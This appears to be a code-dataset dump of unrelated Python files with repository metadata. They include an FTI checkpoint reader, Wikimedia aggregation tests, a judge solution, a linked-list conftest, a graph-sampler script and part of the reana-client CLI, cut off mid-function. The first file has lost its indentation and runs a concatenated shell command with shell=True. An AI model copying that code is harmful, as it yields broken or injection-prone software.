pattern_ckpt_file = "*-Rank"+str(rank_id)+".fti"
if level_dir == '/l4/' and ioMode == "2": # global
pattern_ckpt_file = "-mpiio.fti"#Ckpt1-mpiio.fti
ckpt_file = ""
for root, dirs, files in os.walk(os.path.abspath(ckpt_abs_path)):
for file in files:
file = os.path.join(root, file)
if pattern_ckpt_path in file and pattern_ckpt_file in file:
ckpt_file = file
if level_dir == '/l4/' and ioMode == "2": # global
PFSfile = ckpt_file
# recover from L4 to tmp/
ckpt_file = recover_mpiio_l4(rank_id, PFSfile)
if ckpt_file == "":
print("Checkpoint file not found")
sys.exit(2002)
return ckpt_file
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
def recover_mpiio_l4(rank_id, PFSfile):
# preparing input for mpiio recovery
global nodeSize
global nbApprocs
global nbNodes
global nbHeads
nodeSize = int(nodeSize)
nbHeads = int(nbHeads)
nbApprocs = nodeSize - nbHeads
nbNodes = totalRanks / nodeSize if nodeSize else 0
nbNodes = int(nbNodes)
executable_path = "./mpiio/"
# get fileSize from metafile
# read ckpt_file_size entry of second section
fileSize = 0
meta_pattern = "sector"
meta_file = ""
for root, dirs, files in os.walk(os.path.abspath(meta_abs_path)):
for file in files:
if file.startswith(meta_pattern) is True:
file = os.path.join(root, file)
print(file)
meta_file = file
break
# processing the meta file for the size
config = configparser.ConfigParser()
config.read(meta_file)
fileSize = config['0']['ckpt_file_size']
os.chdir(executable_path)
cmd = "./mpiio_main "+str(rank_id)+" "+str(PFSfile)+" "+str(fileSize)+" "+str(nbApprocs)+" "+str(nbNodes)
subprocess.check_call(cmd, shell=True)
print("Rank ", str(rank_id), " is done copying...")
print(
"MPI-IO recovery finished successfully. "
"Now current dir is",
os.getcwd())
# look for what has been stored under /tmp
ckpt_path = os.getcwd()+"/tmp" # Ckpt1-mpiio.fti
pattern_ckpt_file = "*.fti"
ckpt_file = ""
# find file in this directory
for root, dirs, files in os.walk(os.path.abspath(ckpt_path)):
for file in files:
file = os.path.join(root, file)
if fnmatch(file, pattern_ckpt_file):
ckpt_file = file
if ckpt_path == "":
print("Could not recover from MPI-IO")
sys.exit()
return ckpt_file
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
def find_meta_file(ckpt_file):
meta_file = ""
if level_dir == '/l4/' and ioMode == "2":
print("should take any sector file")
for path, subdirs, files in os.walk(meta_abs_path):
for file in files:
file = meta_abs_path+'/'+execution_id+level_dir+file
meta_file = file
break
# traverse all meta files in the directory
else: # levels (1,2,3)
for path, subdirs, files in os.walk(meta_abs_path):
for file in files:
file = meta_abs_path+'/'+execution_id+level_dir+file
if os.path.isfile(file) is True:
config = configparser.ConfigParser()
config.read(file)
ckpt = ckpt_file.rsplit('/', 1)[1]
for section in config.sections():
if section.isdigit() is True:
if config[section]['ckpt_file_name'] == ckpt:
meta_file = file
break
if meta_file == "":
print("Metadata file not found")
sys.exit(2004)
return meta_file
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
def process_level(level):
global level_dir
level_dir = '/l'+str(level)+'/'
# print("level dir : ", level_dir)
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
def get_latest_ckpt():
latest = max(glob.glob(
os.path.join(ckpt_abs_path, '*/')), key=os.path.getmtime)
latest = latest.rsplit('/', 1)[0]
latest = latest.rsplit('/', 1)[1]
level = latest[1]
return level
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
def read_checkpoints(config_file, rank_id, ranks=None,
level=None, output=None):
init_config_params(config_file)
if level in fti_levels:
process_level(level)
elif level is None:
# check for latest ckpt
last_level = get_latest_ckpt()
process_level(level)
else:
# invalid fti level
print("Invalid FTI level")
sys.exit(1001)
if output is not None and output not in output_formats:
print("Wrong output format. Choose one")
print("CSV (default):: Comma Separated Values file")
print("HDF5 :: Hierarchical Data Format file")
print("data :: numpy array")
sys.exit(1002)
elif output is None:
# default output format (CSV)
output = 'CSV'
if level == 4 and ioMode == 2 and ranks is None:
print("Total # of ranks is required when reading MPI-IO"
" chekpoints from level 4")
sys.exit(1003)
global totalRanks
totalRanks = ranks
process_fti_paths(config_file)
ckpt_file = find_ckpt_file(rank_id)
meta_file = find_meta_file(ckpt_file)
print("Processing ", ckpt_file, " using meta ", meta_file)
# posix_read_ckpts.read_checkpoint(
# ckpt_file, meta_file, config_file, group_size, level, output)
if output == "data":
return posix_read_ckpts.read_checkpoint(
ckpt_file, meta_file, config_file, group_size, level, output)
else:
posix_read_ckpts.read_checkpoint(
ckpt_file, meta_file, config_file, group_size, level, output)
| 8,326 | 0 | 176 |
b15a0e4cd2f7f657e116c512dee66346dc5c3c3d | 10,882 | py | Python | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | 1 | 2018-01-09T07:49:21.000Z | 2018-01-09T07:49:21.000Z | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | null | null | null | tests/test_projectcounts/test_weekly_aggregation.py | wikimedia/analytics-aggregator | e07c0dc2d3102a591e5e968a7e4c49499770fe39 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
"""TestCase for 'weekly' project aggregation functions"""
| 36.516779 | 76 | 0.529314 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for weekly per project aggregation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains tests for weekly per project aggregation of
aggregator.projectcounts.
"""
import aggregator
import testcases
import os
import datetime
class WeeklyProjectAggregationTestCase(testcases.ProjectcountsDataTestCase):
"""TestCase for 'weekly' project aggregation functions"""
def test_weekly_csv_non_existing_csv(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-03': '2014-07-03,4005,4000,4,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W27,28035,28000,28,7',
])
def test_weekly_csv_existing_csv_existing_week(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-03': '2014-07-03,4005,4000,4,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
def test_weekly_csv_existing_csv_existing_week_force(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-03': '2014-07-03,4005,4000,4,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date,
force_recomputation=True)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,28035,28000,28,7',
'2014W28,8,9,10,11',
])
def test_weekly_csv_existing_csv_bad_dates_existing_week(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
bad_dates = [
datetime.date(2014, 7, 3),
datetime.date(2014, 7, 4),
]
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date, bad_dates)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,26633,26600,26,7',
'2014W28,8,9,10,11',
])
def test_weekly_csv_existing_csv_bad_sunday(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
bad_dates = [
datetime.date(2014, 7, 3),
datetime.date(2014, 7, 4),
datetime.date(2014, 7, 6),
]
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date, bad_dates)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,21028,21000,21,7',
'2014W28,8,9,10,11',
])
def test_weekly_csv_existing_csv_only_bad_dates_no_existing_data(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
bad_dates = [
datetime.date(2014, 6, 30),
datetime.date(2014, 7, 1),
datetime.date(2014, 7, 2),
datetime.date(2014, 7, 3),
datetime.date(2014, 7, 4),
datetime.date(2014, 7, 5),
datetime.date(2014, 7, 6),
]
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date, bad_dates)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W28,8,9,10,11',
])
def test_weekly_csv_existing_csv_only_bad_dates_existing_data(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
self.create_file(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W27,4,5,6,7',
'2014W28,8,9,10,11',
])
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01,2003,2000,2,1',
'2014-07-02': '2014-07-02,3004,3000,3,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
bad_dates = [
datetime.date(2014, 6, 30),
datetime.date(2014, 7, 1),
datetime.date(2014, 7, 2),
datetime.date(2014, 7, 3),
datetime.date(2014, 7, 4),
datetime.date(2014, 7, 5),
datetime.date(2014, 7, 6),
]
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date, bad_dates)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W26,1,2,3,4',
'2014W28,8,9,10,11',
])
def test_weekly_csv_zero_and_missing_data(self):
enwiki_file_abs = os.path.join(self.weekly_dir_abs, 'enwiki.csv')
first_date = datetime.date(2014, 7, 1)
last_date = datetime.date(2014, 7, 7)
csv_data = {
'2014-06-29': '2014-06-29,1,2,3,4',
'2014-06-30': '2014-06-30,1002,1000,1,1',
'2014-07-01': '2014-07-01, 3, 0,2,1',
'2014-07-02': '2014-07-02,3001,3000, ,1',
'2014-07-03': '2014-07-03,4005,4000,4,1',
'2014-07-04': '2014-07-04,5006,5000,5,1',
'2014-07-05': '2014-07-05,6007,6000,6,1',
'2014-07-06': '2014-07-06,7008,7000,7,1',
'2014-07-07': '2014-07-07,5,6,7,8',
}
aggregator.update_weekly_csv(self.data_dir_abs, 'enwiki', csv_data,
first_date, last_date)
self.assert_file_content_equals(enwiki_file_abs, [
'2014W27,26036,26000,29,7',
])
| 9,697 | 0 | 215 |
4dfca50f1b3f1df35c4e5dbc925eb02663bd476e | 608 | py | Python | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | python/2542 - Iu-Di-Oh!.py | kaiosatiro/URIjudge_beecrowd | e646c771384e77e6b6e38d88f58aa8c61f0a3cb7 | [
"MIT"
] | null | null | null | while True:
try:
n = int(input())
m,l = map(int, input().split(' '))
m_dic = {}
l_dic = {}
for i in range(1, m+1):
m_dic[i] = list(map(int, input().split(' ')))
for i in range(1, l+1):
l_dic[i] = list(map(int, input().split(' ')))
cm, cl = map(int, input().split(' '))
a = int(input())
m = m_dic[cm][a-1]
l = l_dic[cl][a-1]
if m > l:
print('Marcos')
elif l > m:
print('Leonardo')
else:
print('Empate')
except EOFError:
break | 23.384615 | 57 | 0.404605 | while True:
try:
n = int(input())
m,l = map(int, input().split(' '))
m_dic = {}
l_dic = {}
for i in range(1, m+1):
m_dic[i] = list(map(int, input().split(' ')))
for i in range(1, l+1):
l_dic[i] = list(map(int, input().split(' ')))
cm, cl = map(int, input().split(' '))
a = int(input())
m = m_dic[cm][a-1]
l = l_dic[cl][a-1]
if m > l:
print('Marcos')
elif l > m:
print('Leonardo')
else:
print('Empate')
except EOFError:
break | 0 | 0 | 0 |
7ddbe2a2af26ca48666b40b82ce35ef3a04ace79 | 437 | py | Python | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | 1 | 2021-01-28T07:32:17.000Z | 2021-01-28T07:32:17.000Z | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | null | null | null | data_structures/linked-list/conftest.py | zarkle/data-structures-and-algorithms | 0485b95f5aabc0ee255cd7e50b48a6ccec851e00 | [
"MIT"
] | 1 | 2020-04-10T08:01:50.000Z | 2020-04-10T08:01:50.000Z | import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
"""fixture for empty array"""
return LL()
@pytest.fixture
def small_ll():
"""fixture for short array"""
return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
"""fixture for short array"""
return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
"""fixture for long array"""
return LL([11, 12, 13, 14, 15, 16])
| 16.185185 | 40 | 0.624714 | import pytest
from linked_list import LinkedList as LL
@pytest.fixture
def empty_ll():
"""fixture for empty array"""
return LL()
@pytest.fixture
def small_ll():
"""fixture for short array"""
return LL([1, 2, 3, 4])
@pytest.fixture
def short_ll():
"""fixture for short array"""
return LL([5, 6, 7, 8])
@pytest.fixture
def long_ll():
"""fixture for long array"""
return LL([11, 12, 13, 14, 15, 16])
| 0 | 0 | 0 |
4eb9be9e5bdd2a42932ae0913e83fcaa9ef5590a | 2,403 | py | Python | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | graph_sampler/reject_to_uniform.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')
if __name__ == '__main__':
flags.mark_flags_as_required(['in_file', 'out_file'])
app.run(main)
| 32.917808 | 76 | 0.718685 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
r"""Reject graphs based on importance to produce a uniform sample set.
Usage:
prefix=3_COFH
./reject_to_uniform.py \
--in_file=weighted/${prefix}.graphml \
--out_file=uniform/${prefix}.graphml
"""
from absl import app
from absl import flags
from graph_sampler import graph_io
from graph_sampler import molecule_sampler
FLAGS = flags.FLAGS
flags.DEFINE_string('in_file', None, 'Input file path.')
flags.DEFINE_string('out_file', None, 'Output file path.')
flags.DEFINE_string('seed', None, 'Seed used for random number generation.')
def main(argv):
if len(argv) > 1:
raise RuntimeError(f'Unexpected arguments: {argv[1:]}')
input_stats = graph_io.get_stats(FLAGS.in_file)
max_importance = input_stats['max_final_importance']
with open(FLAGS.in_file) as input_file:
rejector = molecule_sampler.RejectToUniform(
base_iter=graph_io.graph_reader(input_file),
max_importance=max_importance,
rng_seed=FLAGS.seed)
with open(FLAGS.out_file, 'w') as output_file:
for graph in rejector:
graph_io.write_graph(graph, output_file)
if rejector.num_accepted % 10000 == 0:
acc = rejector.num_accepted
proc = rejector.num_processed
print(f'Accepted {acc}/{proc}: {acc / proc * 100:.2f}%')
output_stats = dict(
num_samples=rejector.num_accepted,
estimated_num_graphs=input_stats['estimated_num_graphs'],
rng_seed=rejector.rng_seed)
graph_io.write_stats(output_stats, output_file)
acc = rejector.num_accepted
proc = rejector.num_processed
print(f'Done rejecting to uniform! Accepted {acc}/{proc}: '
f'{acc / proc * 100:.2f}%')
if __name__ == '__main__':
flags.mark_flags_as_required(['in_file', 'out_file'])
app.run(main)
| 1,107 | 0 | 23 |
131cadd4426c23dcd44f31279f6c1992ea0649c5 | 47,673 | py | Python | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | reana_client/cli/workflow.py | VMois/reana-client | 206a7fb5762ac28a97095ad774e88054af53b2f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
"""Top level wrapper for workflow management."""
logging.debug(ctx.info_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
"""Top level wrapper for execution related interaction."""
logging.debug(ctx.info_name)
@workflow_management_group.command("list")
@click.option(
"-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<columm_name>=<column_value>` format. "
"E.g. display workflow with failed status and named test_workflow "
"`--format status=failed,name=test_workflow`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--all",
"show_all",
count=True,
default=True,
help="Show all workflows including deleted ones.",
)
@click.option(
"-v",
"--verbose",
count=True,
help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
"--sort",
"sort_columm_name",
default="CREATED",
help="Sort the output by specified column",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter workflow that contains certain filtering criteria. "
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are `name` and `status`.",
)
@click.option(
"--include-progress",
"include_progress",
is_flag=True,
default=None,
help="Include progress information of the workflows.",
)
@click.option(
"--include-workspace-size",
"include_workspace_size",
is_flag=True,
default=None,
help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows( # noqa: C901
ctx,
sessions,
_format,
output_format,
access_token,
show_all,
verbose,
human_readable_or_raw,
sort_columm_name,
page,
size,
filters,
include_progress,
include_workspace_size,
): # noqa: D301
"""List all workflows and sessions.
The `list` command lists workflows and sessions. By default, the list of
workflows is returned. If you would like to see the list of your open
interactive sessions, you need to pass the `--sessions` command-line
option.
Example: \n
\t $ reana-client list --all \n
\t $ reana-client list --sessions \n
\t $ reana-client list --verbose --bytes
"""
import tablib
from reana_client.api.client import get_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
type = "interactive" if sessions else "batch"
status_filter = None
search_filter = None
if filters:
filter_names = ["name", "status"]
status_filter, search_filter = parse_filter_parameters(filters, filter_names)
if _format:
parsed_format_filters = parse_format_parameters(_format)
try:
response = get_workflows(
access_token,
type,
verbose=bool(verbose),
page=page,
size=size,
status=status_filter,
search=search_filter,
include_progress=include_progress,
include_workspace_size=include_workspace_size,
)
verbose_headers = ["id", "user"]
workspace_size_header = ["size"]
progress_header = ["progress"]
headers = {
"batch": ["name", "run_number", "created", "started", "ended", "status"],
"interactive": [
"name",
"run_number",
"created",
"session_type",
"session_uri",
"session_status",
],
}
if verbose:
headers[type] += verbose_headers
if verbose or include_workspace_size:
headers[type] += workspace_size_header
if verbose or include_progress:
headers[type] += progress_header
data = []
for workflow in response:
workflow["size"] = workflow["size"][human_readable_or_raw]
if workflow["status"] == "deleted" and not show_all:
continue
name, run_number = get_workflow_name_and_run_number(workflow["name"])
workflow["name"] = name
workflow["run_number"] = run_number
if type == "interactive":
workflow["session_uri"] = format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=workflow["session_uri"],
access_token=access_token,
)
row = []
for header in headers[type]:
value = None
if header in progress_header:
value = get_formatted_progress(workflow.get("progress"))
elif header in ["started", "ended"]:
_key = (
"run_started_at" if header == "started" else "run_finished_at"
)
value = workflow.get("progress", {}).get(_key) or "-"
if not value:
value = workflow.get(header)
row.append(value)
data.append(row)
sort_column_id = 2
if sort_columm_name.lower() in headers[type]:
sort_column_id = headers[type].index(sort_columm_name.lower())
data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
if os.getenv("REANA_WORKON", "") in workflow_ids:
active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
for idx, row in enumerate(data):
if idx == active_workflow_idx:
run_number = str(data[idx][headers[type].index("run_number")])
run_number += " *"
tablib_data = tablib.Dataset()
tablib_data.headers = headers[type]
for row in data:
tablib_data.append(row=row, tags=row)
if _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers[type], tablib_data
)
if output_format:
click.echo(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format:
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers[type], _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("create")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token): # noqa: D301
"""Create a new workflow.
The `create` command allows to create a new workflow from reana.yaml
specifications file. The file is expected to be located in the current
working directory, or supplied via command-line -f option, see examples
below.
Examples: \n
\t $ reana-client create\n
\t $ reana-client create -w myanalysis\n
\t $ reana-client create -w myanalysis -f myreana.yaml\n
"""
from reana_client.api.client import create_workflow
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
# Check that name is not an UUIDv4.
# Otherwise it would mess up `--workflow` flag usage because no distinction
# could be made between the name and actual UUID of workflow.
if is_uuid_v4(name):
